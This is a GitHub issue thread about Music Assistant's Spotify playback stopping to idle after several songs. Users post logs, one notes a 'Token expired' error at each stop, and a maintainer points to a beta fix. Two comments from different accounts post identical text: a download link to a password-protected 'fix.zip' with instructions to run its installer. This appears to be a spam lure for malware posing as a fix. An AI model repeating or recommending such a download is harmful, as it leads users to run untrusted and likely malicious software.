### ISSUE TITLE
Spotify stopping playback after multiple songs

### ISSUE THREAD

**Issue by goobags** [music-assistant/hass-music-assistant#2827]
### What version of Music Assistant has the issue?

2.2.2

### What version of the Home Assistant Integration have you got installed?

2024.8.1

### Have you tried everything in the Troubleshooting FAQ and reviewed the Open and Closed Issues and Discussions to resolve this yourself?

- [X] Yes

### The problem

Commencing playback from within MA for music from Spotify will result in the music just finishing after a random song. It does not appear to ever stop mid-song. When reviewing the queue after playback has stopped, there are still many songs left in the queue. Looking into the media player history through HA, it shows the player (Sonos) just going to 'Idle'.

Logging into the developer Spotify portal, I can see the correct user is being used as I can see the API requests for that specific user, which I have entered the Client ID for within MA.

![spotify](https://github.com/user-attachments/assets/fa925b4f-bf94-46ab-ba1a-2a27287d09a8)

### How to reproduce

Play an artist/playlist/radio through Spotify that is typically over 30 minutes long. It seems to take multiple songs before it stops.

### Music Providers

Spotify

### Player Providers

Sonos

### Full log output

[d5369777_music_assistant_2024-08-28T10-17-56.342Z.log](https://github.com/user-attachments/files/16781935/d5369777_music_assistant_2024-08-28T10-17-56.342Z.log)

### Additional information

There are obviously a couple of errors in the log, which don't seem to be an issue. The issue which stops music playback occurs at 17:17 which is shown in the attached screenshot with the player going to idle.

![living room](https://github.com/user-attachments/assets/6cdf7dad-2761-43d0-9f15-488f1e30c0c8)

### What version of Home Assistant Core are your running

2024.08.3

### What type of installation are you running?

Home Assistant OS

### On what type of hardware are you running?

Generic x86-64 (e.g. Intel NUC)

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by OzGav** [comment]
This is probably a Sonos provider problem. Can you try the latest beta?

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HannesKra** [comment]
I'm encountering the same issue with different hardware.

Home Assistant OS version: 12.4
Home Assistant Core version: 2024.8.0
Music Assistant Server Current version: 2.2.2
Music Assistant Integration version 2024.8.1
Player: Raspiaudio Muse Proto running firmware: I2S-4MFlash-1673, mode: Squeezelite-ESP32
Player is integrated via Player Provider Slimproto.

Log:
[log.txt](https://github.com/user-attachments/files/16786142/log.txt)

The player changed to idle at 23:27:01, playback was restarted by an automation at around 06:30:00. The player again went to idle at 07:09:47. 

The transitions to idle happen about 10 seconds after the log entry "INFO (MainThread) [music_assistant.spotify] Attempt 1/5 failed: Token expired". The same line is in the log from @goobags at the time of transition to idle.

**Comment by jonasjeeliasson** [comment]
I've experience exactly the same issue the last few days while I'm playing music on my Cast devices. Just stops playing randomly after some song and shows up as idle in HA.

Home Assistant OS version: 13.1
Home Assistant Core version: 2024.8.3
Music Assistant Server Current version: 2.2.2
Music Assistant Integration version 2024.8.1

**Comment by marcelveldt** [comment]
This is fixed in the current beta version - I just did not push another update to stable yet as I am waiting for confirmation of some fixes.

**Comment by goobags** [comment]
Slightly off topic question, but am I able just to stop the MA add on, then install and start the beta for testing, then revert back without breaking too much stuff?

**Comment by OzGav** [comment]
Yes won’t break anything as they are in different containers. I have seen a HA problem where the container won’t restart but it eventually came good.

**Comment by jonasjeeliasson** [comment]
> This is fixed in the current beta version - I just did not push another update to stable yet as I am waiting for confirmation of some fixes.

Is the fix specifically for Sonos or was it something else? Just want to make sure if the fix will resolve the issue for me as well whenever it goes out of beta or if I should file a more detailed ticket from my system as a separate issue. My symptoms are exactly the same but I don't have any Sonos device, only Google Cast ones.

**Comment by OzGav** [comment]
@jonasjeeliasson Go to the repo and look at the server and all open and closed PRs are visible there.

if after the next stable update you still have problems then yes open a new issue.

**Comment by jonasjeeliasson** [comment]
> @jonasjeeliasson Go to the repo and look at the server and all open and closed PRs are visible there.
> 
> if after the next stable update you still have problems then yes open a new issue.

I tried looking for it but couldn't figure out which ticket, it's these ones you mean right:
https://github.com/music-assistant/server/pulls?q=sort%3Aupdated-desc+is%3Apr+is%3Aclosed

I just wonder if the fix was specifically for Sonos because then I'm guessing I'll still have issues since I don't use Sonos, but if the fix was for something more generic then I guess it might resolve the issue for me as well.

**Comment by OzGav** [comment]
@jonasjeeliasson yes those are the PRs. Just try the latest beta and see if you issue is fixed. If not we will look at it further.

**Comment by OzGav** [comment]
@goobags plrase confirm this is fixed with beta 16

**Comment by goobags** [comment]
I have been away, and had a bit of an issue trying to run the beta alongside the main version, so haven't had a chance to test it. I have now installed the beta only and have music playing on some speakers now through Spotify, I am not listening but will keep an eye on the logs.

**Comment by goobags** [comment]
So I am streaming music to a different speaker, however it is still a Sonos speaker and I got the error multiple times using beta 2.3.0b17 however the music continued to play so the problem is somewhat fixed for me.

**Comment by OzGav** [comment]
OK if this issue is fixed I will close. If you have a different problem now then open a new issue,
